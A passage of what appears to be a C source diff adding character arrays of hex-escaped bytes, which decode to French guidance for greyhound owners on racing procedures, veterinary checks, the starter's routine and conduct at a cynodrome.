+"\x61\x6e\x74\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x34\x20\x73"
+"\x65\x6d\x61\x69\x6e\x65\x73\x2e\x20\x43\x65\x6c\x61\x20\x65\x73"
+"\x74\x20\x70\x6f\x72\x74\xe9\x20\x73\x75\x72\x20\x6c\x65\x20\x63"
+"\x61\x72\x6e\x65\x74\x20\x65\x74\x20\x73\x75\x72\x20\x6c\x65\x20"
+"\x63\x61\x72\x74\x6f\x6e\x20\x63\x6f\x6c\x6f\x72\xe9\x2e\x20\x0d"
+"\x0d\x44\x6f\x6e\x63\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72"
+"\x69\x72\x20\x69\x6c\x20\x66\x61\x75\x74\x20\x33\x20\x64\x6f\x63"
+"\x75\x6d\x65\x6e\x74\x73\x20\x3a\x0d\x20\x43\x41\x52\x4e\x45\x54"
+"\x20\x2b\x20\x42\x41\x43\x20\x2b\x20\x43\x41\x52\x54\x4f\x4e\x20"
+"\x43\x4f\x4c\x4f\x52\x45\x0d\x0d\x4c\x65\x20\x70\x61\x73\x73\x61"
+"\x67\x65\x20\x64\x75\x20\x42\x50\x56\x20\x3a\x0d\x4c\x65\x20\x63"
+"\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c"
+"\x20\x65\x73\x74\x20\x64\xe0\x66\x66\xe9\x72\x65\x6e\x74\x20\x28"
+"\x76\x65\x72\x74\x29\x20\x65\x74\x20\x6c\x65\x73\x20\x6d\x6f\x64"
+"\x61\x6c\x69\x74\xe9\x73\x20\x64\x65\x20\x71\x75\x61\x6c\x69\x66"
+"\x69\x63\x61\x74\x69\x6f\x6e\x20\x73\x6f\x6e\x74\x20\x61\x6e\x61"
+"\x6c\x6f\x67\x75\x65\x73\x2c\x20\x6d\x61\x69\x73\x20\x65\x6e\x20"
+"\x73\x6f\x6c\x6f\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x70\x6c"
+"\x65\x2e\x0d\x56\x6f\x75\x73\x20\xea\x74\x65\x73\x20\x64\xe9\x73"
+"\x6f\x72\x6d\x61\x69\x73\x20\x70\x72\xea\x74\x20\x70\x6f\x75\x72"
+"\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9\x74\x69\x74\x69\x6f\x6e\x2e"
+"\x0d\x0d\x51\x75\x65\x20\x64\x65\x76\x65\x7a\x2d\x76\x6f\x75\x73"
+"\x20\x73\x61\x76\x6f\x69\x72\x20\x3f\x0d\x54\x6f\x75\x74\x65\x73"
+"\x20\x6c\x65\x73\x20\xe9\x76\x65\x6e\x74\x75\x61\x6c\x69\x74\xe9"
+"\x73\x20\x73\x6f\x6e\x74\x20\x64\xe9\x63\x72\x69\x74\x65\x73\x20"
+"\x65\x6e\x20\x64\xe9\x74\x61\x69\x6c\x20\x64\x61\x6e\x73\x20\x6c"
+"\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x64\x65\x73\x20"
+"\xe9\x70\x72\x65\x75\x76\x65\x73\x2c\x20\x71\x75\x69\x20\x63\x6f"
+"\x6d\x70\x72\x65\x6e\x64\x20\x6c\x65\x73\x20\x72\xe8\x67\x6c\x65"
+"\x73\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x69\x76\x65"
+"\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65"
+"\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20\x45\x2e\x4e\x2e\x43\x2e"
+"\x2c\x20\x70\x6f\x75\x72\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x69"
+"\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x2c\x20"
+"\x20\x70\x6f\x75\x72\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x2e\x0d"
+"\x4c\x65\x20\x74\x6f\x75\x74\x20\x66\x61\x69\x74\x20\x65\x6e\x76"
+"\x69\x72\x6f\x6e\x20\x35\x30\x20\x70\x61\x67\x65\x73\x20\x65\x74"
+"\x20\x6e\x65\x20\x70\x65\x75\x74\x20\x64\x6f\x6e\x63\x20\xea\x74"
+"\x72\x65\x20\x64\x69\x66\x66\x75\x73\xe9\x20\xe0\x20\x63\x68\x61"
+"\x63\x75\x6e\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20"
+"\x64\x27\x61\x62\x6f\x72\x64\x20\x65\x6e\x67\x61\x67\x65\x72\x20"
+"\x3a\x0d\x41\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f"
+"\x75\x20\x61\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20"
+"\x64\x75\x20\x63\x6c\x75\x62\x20\x20\x6f\x72\x67\x61\x6e\x69\x73"
+"\x61\x74\x65\x75\x72\x2c\x20\x76\x6f\x75\x73\x20\x65\x6e\x76\x6f"
+"\x79\x65\x7a\x20\x31\x35\x20\x6a\x6f\x75\x72\x73\x20\xe0\x20\x6c"
+"\x27\x61\x76\x61\x6e\x63\x65\x20\x76\x6f\x74\x72\x65\x20\x65\x6e"
+"\x67\x61\x67\x65\x6d\x65\x6e\x74\x20\x73\x75\x72\x20\x75\x6e\x20"
+"\x6d\x6f\x64\xe8\x6c\x65\x20\x74\x79\x70\x65\x2c\x20\x6f\x75\x2c"
+"\x20\xe0\x20\x64\xe9\x66\x61\x75\x74\x20\x73\x75\x72\x20\x70\x61"
+"\x70\x69\x65\x72\x20\x6c\x69\x62\x72\x65\x20\x65\x6e\x20\x72\x65"
+"\x63\x6f\x70\x69\x61\x6e\x74\x20\x6c\x65\x20\x42\x41\x43\x2e\x0d"
+"\x4c\x65\x73\x20\x74\x61\x72\x69\x66\x73\x20\x73\x6f\x6e\x74\x20"
+"\x66\x69\x78\xe9\x73\x20\x70\x61\x72\x20\x6c\x61\x20\x53\x2e\x43"
+"\x2e\x43\x2e\x0d\x56\x6f\x75\x73\x20\x64\x65\x76\x65\x7a\x20\x76"
+"\x6f\x75\x73\x20\x70\x72\xe9\x73\x65\x6e\x74\x65\x72\x20\xe0\x20"
+"\x6c\x27\x68\x65\x75\x72\x65\x20\x6f\x69\x78\xe9\x65\x20\x28\x65"
+"\x6e\x20\x67\xe9\x6e\xe9\x72\x61\x6c\x20\x39\x68\x29\x20\x70\x6f"
+"\x75\x72\x20\x6c\x65\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x76"
+"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x2c\x20\x6d\x75\x6e\x69"
+"\x20\x64\x27\x75\x6e\x20\x63\x65\x72\x74\x69\x66\x69\x63\x61\x74"
+"\x20\x64\x65\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20"
+"\x61\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x76\x61\x6c\x69"
+"\x64\x65\x2e\x20\x41\x20\x64\xe9\x66\x61\x75\x74\x2c\x20\x76\x6f"
+"\x75\x73\x20\x6e\x65\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x70\x61"
+"\x73\x20\x70\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x64\xe9\x70"
+"\x61\x72\x74\x2e\x0d\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61"
+"\x69\x72\x65\x20\x76\xe9\x72\x69\x66\x69\x65\x20\x6c\x65\x73\x20"
+"\x70\x61\x70\x69\x65\x72\x73\x2c\x20\x69\x6c\x20\x63\x6f\x6e\x74"
+"\x72\xf4\x6c\x65\x20\x6c\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72"
+"\x73\x20\x64\x65\x73\x20\x66\x65\x6d\x65\x6c\x6c\x65\x73\x2e\x0d"
+"\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x20"
+"\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65\x6d"
+"\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72\x20"
+"\x73\x75\x72\x20\x75\x6e\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65"
+"\x2c\x20\x63\x61\x72\x20\x63\x65\x6c\x61\x20\x76\x61\x20\xe9\x6e"
+"\x65\x72\x76\x65\x72\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72"
+"\x72\x65\x6e\x74\x73\x20\x65\x74\x20\x70\x65\x75\x74\x20\x63\x6f"
+"\x6e\x64\x75\x69\x72\x65\x20\xe0\x20\x64\x65\x73\x20\x64\x69\x73"
+"\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x73\x2e\x0d"
+"\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x63"
+;
+char file_part1[]=
+"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x27\xe9\x74\x61\x74\x20\x64"
+"\x65\x20\x73\x61\x6e\x74\xe9\x20\x65\x74\x20\x6e\x6f\x74\x61\x6d"
+"\x6d\x65\x6e\x74\x20\x63\x65\x6c\x75\x69\x20\x64\x65\x73\x20\x64"
+"\x6f\x69\x67\x74\x73\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69\x65"
+"\x72\x73\x20\x70\x6f\x75\x72\x20\x64\xe9\x74\x65\x63\x74\x65\x72"
+"\x20\x64\x65\x73\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x2e\x20"
+"\x44\x61\x6e\x73\x20\x6c\x65\x75\x72\x20\x69\x6e\x74\xe9\x72\xea"
+"\x74\x2c\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x69\x6e\x74\x65\x72"
+"\x64\x69\x72\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d"
+"\x4f\x6e\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\x6c\x65"
+"\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x20\x64\x65\x20\x6c\x61"
+"\x20\x6a\x6f\x75\x72\x6e\xe9\x65\x2c\x20\x6d\x61\x69\x73\x20\x69"
+"\x6c\x20\x79\x20\x61\xc0\x72\x61\x20\x73\x6f\x75\x76\x65\x6e\x74"
+"\x20\x64\x65\x73\x20\x6d\x6f\x64\x69\x66\x69\x63\x61\x74\x69\x6f"
+"\x6e\x73\x2e\x20\x45\x63\x6f\x75\x74\x65\x7a\x20\x62\x69\x65\x6e"
+"\x20\x6c\x65\x73\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e"
+"\x73\x20\x64\x69\x66\x66\x75\x73\xe9\x65\x73\x20\x70\x61\x72\x20"
+"\x6c\x61\x20\x73\x6f\x6e\x6f\x20\x65\x74\x20\x73\x75\x69\x76\x65"
+"\x7a\x20\x63\x65\x20\x71\x75\x27\x69\x6c\x20\x79\x20\x61\x20\x61"
+"\x75\x20\x74\x61\x62\x6c\x65\x61\x75\x20\x64\x27\x61\x66\x66\x69"
+"\x63\x68\x61\x67\x65\x2e\x0d\x0d\x41\x76\x61\x6e\x74\x20\x63\x68"
+"\x61\x71\x75\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\xf9\x20\x76"
+"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74"
+"\x20\x69\x6e\x73\x63\x72\x69\x74\x2c\x20\x76\x6f\x75\x73\x20\x6c"
+"\x27\x61\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x63\x6f\x6e\x74\x72"
+"\xf4\x6c\x65\x20\x64\x65\x20\x64\xe9\x70\x61\x72\x74\x20\x6d\x75"
+"\x6e\x69\x20\x64\x65\x20\x73\x61\x20\x63\x61\x73\x61\x71\x75\x65"
+"\x20\x28\x6c\x65\x20\x6e\x75\x6d\xe9\x72\x6f\x20\x65\x73\x74\x20"
+"\x61\x75\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x29\x20\x65\x74"
+"\x20\x64\x65\x20\x73\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65"
+"\x2e\x20\x4c\xe0\x2c\x20\x76\x6f\x75\x73\x20\x74\x69\x72\x65\x7a"
+"\x20\x61\x75\x20\x73\x6f\x72\x74\x20\x6c\x61\x20\x63\x61\x73\x65"
+"\x20\x64\x61\x6e\x73\x20\x6c\x61\x71\x75\x65\x6c\x6c\x65\x20\x76"
+"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x65\x72"
+"\x61\x20\x70\x6c\x61\x63\xe9\x20\x61\x75\x20\x64\xe9\x70\x61\x72"
+"\x74\x2e\x0d\x0d\x41\x20\x6c\x27\x61\x70\x70\x65\x6c\x20\x64\x75"
+"\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x6c\xe9\x76\x72\x69\x65"
+"\x72\x73\x20\x61\x75\x20\x64\xe9\x70\x61\x72\x74\x20\x64\x65\x20"
+"\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x6e\xb0\x78\x29\x20\x76"
+"\x6f\x75\x73\x20\x61\x6c\x6c\x65\x7a\x20\x64\x61\x6e\x73\x20\x6c"
+"\x27\x6f\x72\x64\x72\x65\x20\x64\x65\x73\x20\x63\x61\x73\x65\x73"
+"\x2c\x20\x63\x68\x61\x63\x75\x6e\x20\x73\x65\x20\x6d\x65\x74\x20"
+"\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20\x73\x69\x65\x6e"
+"\x6e\x65\x2c\x20\x65\x74\x20\xe0\x20\x6c\x27\x6f\x72\x64\x72\x65"
+"\x20\x64\x75\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x65\x6e\x20"
+"\x62\x6f\x69\x74\x65\x29\x20\x76\x6f\x75\x73\x20\x6c\x27\x69\x6e"
+"\x74\x72\x6f\x64\x75\x69\x72\x65\x7a\x20\x65\x6e\x20\x66\x65\x72"
+"\x6d\x61\x6e\x74\x20\x62\x69\x65\x6e\x20\x6c\x61\x20\x70\x6f\x72"
+"\x74\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x75\x69\x20"
+"\x73\x61\x6e\x73\x20\x72\x61\x6c\x65\x6e\x74\x69\x72\x20\x6c\x61"
+"\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x62\x6f\x69\x74\x65\x2e\x0d"
+"\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74\x20\x70\x61"
+"\x72\x74\x69\x65\x2c\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65"
+"\x76\x65\x7a\x20\x70\x61\x73\x20\x63\x72\x69\x65\x72\x20\x61\x70"
+"\x72\xe8\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61"
+"\x75\x20\x72\x69\x73\x71\x75\x65\x20\x64\x65\x20\x6c\x65\x20\x66"
+"\x61\x69\x72\x65\x20\x72\x65\x76\x65\x6e\x69\x72\x20\x76\x65\x72"
+"\x73\x20\x76\x6f\x75\x73\x2e\x20\x56\x6f\x75\x73\x20\x6e\x65\x20"
+"\x64\x65\x76\x65\x7a\x20\x70\x61\x73\x20\x6c\x27\x65\x78\x63\x69"
+"\x74\x65\x72\x20\x70\x61\x72\x20\x75\x6e\x20\x6d\x6f\x79\x65\x6e"
+"\x20\x71\x75\x65\x6c\x63\x6f\x6e\x71\x75\x65\x2e\x20\x20\x56\x6f"
+"\x75\x73\x20\x76\x6f\x75\x73\x20\x72\x61\x70\x70\x72\x6f\x63\x68"
+"\x65\x7a\x20\x64\x65\x20\x6c\x61\x20\x7a\x6f\x6e\x65\x20\x64\x27"
+"\x61\x72\x72\x69\x76\xe9\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72"
+"\x65\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x72\xe9\x63\x75\x70\xe9"
+"\x72\x65\x72\x20\x64\xe8\x73\x20\x6c\x27\x61\x72\x72\x69\x76\xe9"
+"\x65\x2e\x0d\x0d\x41\x70\x72\xe8\x73\x20\x6c\x27\x61\x76\x6f\x69"
+"\x72\x20\x72\xe9\x63\x75\x70\xe9\x72\xe9\x2c\x20\x76\x6f\x75\x73"
+"\x20\xf4\x74\x65\x7a\x20\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8"
+"\x72\x65\x20\x65\x74\x20\x76\x6f\x75\x73\x20\x6c\x65\x20\x72\x61"
+"\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x72\x65\x70\x6f\x73\x2c\x20"
+"\x20\x64\x65\x20\x70\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65\x20\x65"
+"\x6e\x20\x6c\x65\x20\x66\x61\x69\x73\x61\x6e\x74\x20\x75\x6e\x20"
+"\x70\x65\x75\x20\x6d\x61\x72\x63\x68\x65\x72\x20\x70\x6f\x75\x72"
+"\x20\x6c\x65\x20\x64\xe9\x74\x65\x6e\x64\x72\x65\x2e\x0d\x4c\x65"
+"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x73\x65\x72\x61\x20\x61"
+"\x66\x66\x69\x63\x68\xe9\x2e\x0d\x0d\x45\x6e\x20\x50\x2e\x56\x2e"
+"\x4c\x2e\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65\x76\x65\x7a"
+"\x20\x70\x61\x73\x20\x6c\x61\x69\x73\x73\x65\x72\x20\x6c\x65\x20"
+"\x4c\xe9\x76\x72\x69\x65\x72\x20\x76\x6f\x69\x72\x20\x6c\x65\x20"
+"\x70\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x63\x61\x72\x20\x69\x6c"
+"\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x6f\x75\x70\x65\x72"
+"\x20\x65\x74\x20\xea\x74\x72\x65\x20\x70\xe9\x6e\x61\x6c\x69\x73"
+"\xe9\x2e\x0d\x0d\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x65\x75\x20"
+"\x64\x65\x73\x20\x69\x6e\x63\x69\x64\x65\x6e\x74\x73\x2c\x20\x67"
+"\x61\x72\x64\x65\x7a\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c\x6d"
+"\x65\x2e\x20\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74"
+"\x20\x75\x6e\x20\x73\x70\x6f\x72\x74\x20\x70\x6c\x65\x69\x6e\x20"
+"\x64\x27\x61\x6c\xe9\x61\x73\x20\x65\x74\x20\x6c\x65\x73\x20\x4c"
+"\xe9\x76\x72\x69\x65\x72\x73\x20\x6f\x6e\x74\x20\x70\x61\x72\x66"
+"\x6f\x69\x73\x20\x75\x6e\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d"
+"\x65\x6e\x74\x20\x74\x72\xe8\x73\x20\x64\xe9\x63\x65\x76\x61\x6e"
+"\x74\x2e\x20\x4e\x27\x61\x67\x72\x65\x73\x73\x65\x7a\x20\x70\x61"
+"\x73\x20\x6c\x65\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72"
+"\x65\x20\x64\x27\x75\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x71"
+"\x75\x69\x20\x61\x20\x67\xea\x6e\xe9\x20\x6c\x65\x20\x76\xf4\x74"
+"\x72\x65\x2e\x20\x49\x6c\x20\x6e\xf9\x79\x20\x65\x73\x74\x20\x70"
+"\x6f\x75\x72\x20\x72\x69\x65\x6e\x20\x65\x74\x20\x65\x73\x74\x20"
+"\x64\xe9\x6a\xe0\x20\x61\x73\x73\x65\x7a\x20\x6d\x61\x6c\x68\x65"
+"\x75\x72\x65\x75\x78\x20\x64\x27\xea\x74\x72\x65\x20\x64\x69\x73"
+"\x71\x75\x61\x6c\x69\x66\x69\xe9\x2e\x20\x4e\x65\x20\x76\x6f\x75"
+"\x73\x20\x65\x6e\x20\x70\x72\x65\x6e\x65\x7a\x20\x70\x61\x73\x20"
+"\x61\x75\x78\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73"
+"\x20\x6e\x69\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x73\x69\x20\x76"
+"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74"
+"\x20\x73\x61\x6e\x63\x74\x69\x6f\x6e\x6e\xe9\x20\x73\x61\x6e\x73"
+"\x20\x71\x75\x65\x20\x76\x6f\x75\x73\x20\x61\x79\x69\x65\x7a\x20"
+"\x76\x75\x20\x71\x75\x65\x6c\x71\x75\x65\x20\x63\x68\x6f\x73\x65"
+"\x2c\x20\x6f\x75\x20\x70\x61\x72\x63\x65\x20\x71\x75\x65\x20\x76"
+"\x6f\x75\x73\x20\x69\x6e\x63\x72\x69\x6d\x69\x6e\x65\x7a\x20\x75"
+"\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x0d\x56\x6f"
+"\x75\x73\x20\x61\x76\x65\x7a\x20\x61\x66\x66\x61\x69\x72\x65\x20"
+"\xe0\x20\x64\x65\x73\x20\x62\xe9\x6e\xe9\x76\x6f\x6c\x65\x73\x20"
+"\x65\x78\x70\xe9\x72\x69\x6d\x65\x6e\x74\xe9\x73\x2c\x20\x64\x6f"
+"\x6e\x74\x20\x6c\x65\x73\x20\x64\xe9\x63\x69\x73\x69\x6f\x6e\x73"
+"\x20\x73\x6f\x6e\x74\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x2c"
+"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\xe9\x65\x73\x20\x70\x61\x72\x20"
+"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9"
+"\x76\x72\x69\x65\x72\x73\x2e\x20\x43\x65\x20\x71\x75\x27\x69\x6c"
+"\x73\x20\x20\x6f\x6e\x74\x20\x76\x75\x20\xe0\x20\x31\x35\x30\x20"
+"\x6d\xe8\x74\x72\x65\x73\x20\x64\x65\x20\x76\x6f\x75\x73\x2c\x20"
+"\xe0\x20\x35\x30\x20\x4b\x6d\x2f\x68\x2c\x20\x70\x65\x75\x74\x20"
+"\x6e\x27\x61\x76\x6f\x69\x72\x20\x64\x75\x72\xe9\x20\x71\x75\x65"
+"\x20\x31\x20\x6f\x75\x20\x32\x20\x64\x69\x78\x69\xe8\x6d\x65\x73"
+"\x20\x64\x65\x20\x73\x65\x63\x6f\x6e\x64\x65\x20\x28\x32\x6d\x29"
+"\x2e\x20\x52\x61\x70\x70\x65\x6c\x65\x7a\x2d\x76\x6f\x75\x73\x20"
+"\x71\x75\x65\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65"
+"\x72\x20\x73\x65\x6e\x74\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c"
+"\x6d\x65\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\xe9\x6e\x65\x72"
+"\x76\x65\x6d\x65\x6e\x74\x2c\x20\x71\x75\x65\x20\x73\x65\x73\x20"
+"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x74\x20\x73\x6f\x6e"
+"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x73\x27"
+"\x65\x6e\x20\x72\x65\x73\x73\x65\x6e\x74\x65\x6e\x74\x2e\x0d\x4c"
+"\x61\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x65\x20\x66\x61\xe7\x6f"
+"\x6e\x20\x64\x65\x20\x70\x65\x72\x64\x72\x65\x20\x65\x73\x74\x20"
+"\x64\x27\x61\x62\x6f\x72\x64\x20\x64\x65\x20\x73\x65\x20\x63\x6f"
+"\x6d\x70\x6f\x72\x74\x65\x72\x20\x65\x6e\x20\x6d\x61\x75\x76\x61"
+"\x69\x73\x20\x70\x65\x72\x64\x61\x6e\x74\x2e\x0d\x53\x69\x20\x76"
+"\x6f\x75\x73\x20\x6e\x65\x20\x70\x61\x72\x76\x65\x6e\x65\x7a\x20"
+"\x70\x61\x73\x20\xe0\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x74\x72"
+"\xf4\x6c\x65\x72\x2c\x20\x61\x62\x61\x6e\x64\x6f\x6e\x6e\x65\x7a"
+"\x20\x6c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72\x69\x65"
+"\x72\x2e\x0d\x53\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20"
+"\x75\x6e\x65\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x69\x6f\x6e\x20"
+"\xe0\x20\x66\x61\x69\x72\x65\x2c\x20\x61\x64\x72\x65\x73\x73\x65"
+"\x7a\x2d\x76\x6f\x75\x73\x20\x61\x75\x20\x63\x68\x65\x66\x20\x64"
+"\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x73\x65\x75\x6c\x65\x20\x70"
+"\x65\x72\x73\x6f\x6e\x6e\x65\x20\x61\x75\x74\x6f\x72\x69\x73\xe9"
+"\x65\x20\xe0\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x74\x72\x65\x20"
+"\x6c\x65\x73\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73"
+"\x2e\x0d\x0d\x41\x20\x6c\x27\x69\x73\x73\x75\x65\x20\x64\x65\x20"
+"\x6c\x61\x20\x72\xe9\x75\x6e\x69\x6f\x6e\x20\x6f\x6e\x20\x76\x6f"
+"\x75\x73\x20\x72\x65\x6d\x65\x74\x74\x72\x61\x20\x76\x6f\x74\x72"
+"\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\xfb\x6d\x65\x6e\x74\x20"
+"\x72\x65\x6d\x70\x6c\x69\x2c\x20\x76\x6f\x73\x20\x70\x72\x69\x78"
+"\x2e\x20\x43\x6f\x6e\x74\x72\xf4\x6c\x65\x7a\x20\x62\x69\x65\x6e"
+"\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x63\x61\x72\x20\x69"
+"\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69\x72\x20\x65"
+"\x75\x20\x64\x65\x73\x20\x65\x72\x72\x65\x75\x72\x73\x20\x64\x65"
+"\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x71"
+"\x75\x27\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x66\x66\x69\x63"
+"\x69\x6c\x65\x20\x64\x65\x20\x63\x6f\x72\x72\x69\x67\x65\x72\x20"
+"\x65\x6e\x73\x75\x69\x74\x65\x2e\x0d\x53\x6f\x79\x65\x7a\x20\x70"
+"\x61\x74\x69\x65\x6e\x74\x20\x3a\x20\x4c\x65\x20\x73\x65\x63\x72"
+"\xe9\x74\x61\x72\x69\x61\x74\x20\x61\x75\x72\x61\x20\x63\x6f\x6e"
+"\x73\x61\x63\x72\xe9\x20\x6c\x61\x20\x70\x61\x75\x73\x65\x20\x64"
+"\x75\x20\x64\xe9\x6a\x65\x75\x6e\x65\x72\x20\xe0\x20\x70\x72\xe9"
+"\x2d\x72\x65\x6d\x70\x6c\x69\x72\x20\x6c\x65\x73\x20\x63\x61\x72"
+"\x6e\x65\x74\x73\x2c\x20\x6d\x61\x69\x73\x20\x6c\x61\x69\x73\x73"
+"\x65\x7a\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x6c\x65\x20\x74\x65"
+"\x6d\x70\x73\x20\x64\x27\x69\x6e\x73\x63\x72\x69\x72\x65\x20\x6c"
+"\x65\x20\x63\x6c\x61\x73\x73\x65\x6d\x65\x6e\x74\x20\x65\x74\x20"
+"\x64\x65\x20\x73\x69\x67\x6e\x65\x72\x2e\x20\x56\x6f\x75\x73\x20"
+"\x61\x76\x65\x7a\x20\x70\x65\x75\x74\x2d\xea\x74\x72\x65\x20\x75"
+"\x6e\x65\x20\x6c\x6f\x6e\x67\x75\x65\x20\x64\x69\x73\x74\x61\x6e"
+"\x63\x65\x20\xe0\x20\x70\x61\x72\x63\x6f\x75\x72\x69\x72\x20\x70"
+"\x6f\x75\x72\x20\x72\x65\x6e\x74\x72\x65\x72\x20\x63\x68\x65\x7a"
+"\x20\x76\x6f\x75\x73\x2c\x20\x6d\x61\x69\x73\x20\x6f\x6e\x20\x6e"
+"\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x76\x6f\x75\x73\x20"
+"\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74"
+"\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x76\x6f\x74\x72\x65\x20\x63"
+"\x68\x69\x65\x6e\x20\x61\x20\xe9\x74\xe9\x20\x70\x72\xe9\x6d\x61"
+"\x74\x75\x72\xe9\x6d\x65\x6e\x74\x20\xe9\x6c\x69\x6d\x69\x6e\xe9"
+"\x2e\x20\x56\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20\x74\x6f"
+"\x75\x6a\x6f\x75\x72\x73\x20\x64\x65\x6d\x61\x6e\x64\x65\x72\x20"
+"\xe0\x20\x75\x6e\x20\x61\x6d\x69\x20\x64\x65\x20\x72\xe9\x63\x75"
+"\x70\xe9\x72\x65\x72\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20"
+"\xe0\x20\x76\x6f\x74\x72\x65\x20\x70\x6c\x61\x63\x65\x20\x73\x69"
